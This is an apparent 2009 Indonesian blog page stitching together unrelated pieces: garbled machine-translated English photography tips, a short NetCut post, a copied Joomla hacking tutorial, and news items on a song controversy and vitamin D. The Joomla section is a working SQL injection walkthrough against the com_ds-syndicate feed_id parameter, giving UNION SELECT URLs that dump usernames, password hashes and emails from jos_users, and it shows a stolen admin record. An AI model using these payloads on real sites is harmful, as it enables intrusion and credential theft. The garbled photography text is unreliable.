Portrait Photography Tips

Now here is a little photo precious, I can learn. Simply start shooting and questions of law people shoot the photo. As a photographer, you should not subtract. I promise, it is not as scary as it sounds..........

What does the ISO setting on my camera

Today the same principle applied in the sensor of a digital camera. Look less sensitive lower ISO setting on a digital sensor is too light and the need for more light (variable Aperture or shutter speed) of a photo is well exposed.....

Nikon Coolpix P150

Nikon Coolpix P150 is a new compact camera designed super zoom, talk with enthusiastic passionate photographer. P150 is mechanically stabilized zoom with a focal length of 1000 mm and a page 24 innovative mass 42 x optical zoom control.

Shutter Speed vs Aperture vs Iso On Camera

Firstly, it is important to note that there is an optimal exposure for each photo that you want to use. Fortunately, this automatically in your camera (or at least some very old devices work!). Given the opportunity as a photographer, however, select camera setting up the exhibition.

Senin, 20 April 2009

Menangani aplikasi NETCUT


pernahkah anda dengar aplikasi netcut? kalau anda belum pernah dengar aq jelasin sedikit tentang netcut, netcut adalah aplikasi untuk memutuskan koneksi internet USER/Client dari server secara software tanpa perlu menginstall di sisi client,software ini memang ampuh untuk memutuskan jaringan, tapi bagaimana kalau anda sendiri yang kena ma itu aplikasi? pasti kesal bukan, yang aq disini akan sharing disini gimana caranya melawan aplikasi netcut yaitu dengan aplikasi anti netcut yang bisa di download disini setelah selesai di download tinggal anda aktifkan aplikasi tersebut selsai deh, komputer anda sudah tidak bisa lagi diputus jaringnya dengan aplikasi netcut...

semoga bisa bermanfaat..........

Rabu, 25 Februari 2009

hacking joomla

Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.


Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1


Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ' ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1'


Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds' dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* --> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* --> errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+jos_users

lihat paling akhir dari baris tersebut,
from+jos_users

jos_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,


Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.


Lihat angka 2 di dalam tag :



Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini ...

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+jos_users


perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :


Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D.

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut ...


Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :


admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://networkandgame.890m.com/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya
Peterpanz yang kerepotan ngurus skripsi juga :D, mr.freeman, for jojo too, najwa[at]STSN, dr.emi, denice the manace, Phii_, fadli

sumber : www.ilmuwebsite.com

Musdah Mulia: Itu Lagu Sampah dan Kampungan

Jakarta - Meski belum rilis, lagu 'Madu 3' yang dinyanyikan oleh Ahmad Dhani menuai kontroversi. Lagu tersebut dianggap lagu sampah, kampungan dan tidak layak untuk dibeli.

"Orang sehat akan menilai itu lagu sampah," ujar cendikiawan muslim Siti Musdah Mulia dalam perbincangan dengan detikcom, Kamis (26/2/2009).

Namun, menurut Musdah tidak perlu ada seruan agar lagu itu diboikot. Karena negara menjamin kebebasan berekspresi warganya, termasuk kebebasan dalam memilih sebuah lagu untuk dinyanyikan.

"Kebebasan berekspersi dijamin negara, sepanjang tidak memaksakan orang lain untuk mendengar, silakan berkompetisi dalam bermusik," kata perempuan Indonesia pertama yang meraih gelar doktor di bidang pemikiran politik Islam ini.

Meski tidak harus memboikot lagu nyentrik ini, Musdah menilai harus ada advokasi bagi masyarakat. Masyarakat diharapkan diberi pengertian yang baik serta harus pandai-pandai memilah-milah mana lagu yang baik untuk didengar atau sebaliknya.

"Kita harus memberi pendidikan kesadaran moralitas, memilih dan memilah lagu. Memang susah juga melarang, tapi buat saya pendidikan kepada publik harus diperkuat," imbuhnya.

"Jadi nggak usah dilarang. Makin dilarang makin jadi," kata pejuang gender ini sambil tertawa.

Musdah mencontohkan, tindakan-tindakan yang terkesan mengeksploitasi perempuan lama-lama tidak akan laku. Bahkan, dia menganggap tindakan itu sebagai perbuatan kampungan.

"Nggak usah ada seruan memboikot. Warung Ayam Bakar Wong Solo yang warung poligami aja sekarang nggak laku. Itu kampungan, nggak dewasa," pungkas Musdah. (anw/iy)

Vitamin D Kurangi Risiko Kematian!

Washington - Vitamin D bukan cuma baik untuk kesehatan. Tapi juga bisa memperpanjang usia Anda.

Riset terbaru dari Universitas Johns Hopkins menyimpulkan bahwa asupan vitamin D yang lebih besar mengurangi kemungkinan Anda meninggal dini.

Hasil sejumlah studi juga menunjukkan, kekurangan vitamin D meningkatkan risiko kematian hingga 26 persen. Vitamin D juga mengurangi tingkat kematian dari hampir semua jenis kanker termasuk kanker payudara, usus dan prostat.

Para periset juga menyimpulkan bahwa vitamin D membantu mencegah penyakit diabetes, ginjal dan kardiovaskular. Dokter penyakit dalam asal Atlanta, AS Reginald Fowler mengatakan, 80 persen pasiennya kekurangan vitamin krusial tersebut yang mempertahankan level darah normal dari kalsium dan fosfor di dalam tubuh.

Dr Fowler kerap melakukan skrining untuk vitamin D selama memeriksa pasiennya. Tes darah yang simpel bisa mengecek level vitamin D yang harus mencapai 30 nanogram per milimeter atau lebih.

Dikatakannya, orang yang kekurangan vitamin D bisa mengalami nyeri otot. Bahkan kekurangan vitamin D yang parah dan berlangsung lama bisa memicu penyakit rakhitis, pelemahan dan kerapuhan tulang.

"Ini bukan hal untuk dianggap main-main," kata Dr Fowler seperti dilansir harian News.com.au, Kamis (26/2/2009).

Seperti diketahui sinar matahari membantu tubuh memproduksi vitamin D. Namun terlalu sering berjemur di bawah sinar matahari juga bisa meningkatkan risiko kanker kulit. Jadi makanan dan suplemen umumnya dipandang sebagai sumber terbaik vitamin D.

Untuk meningkatkan asupan vitamin D, makanlah lebih banyak makanan yang kaya vitamin D seperti ikan tuna, salmon, sereal, kacang-kacangan, jus jeruk dan susu. Bisa juga mengkonsumsi suplemen vitamin D-3 seperti cholecalciferol.
(ita/iy)

sumber: detik.com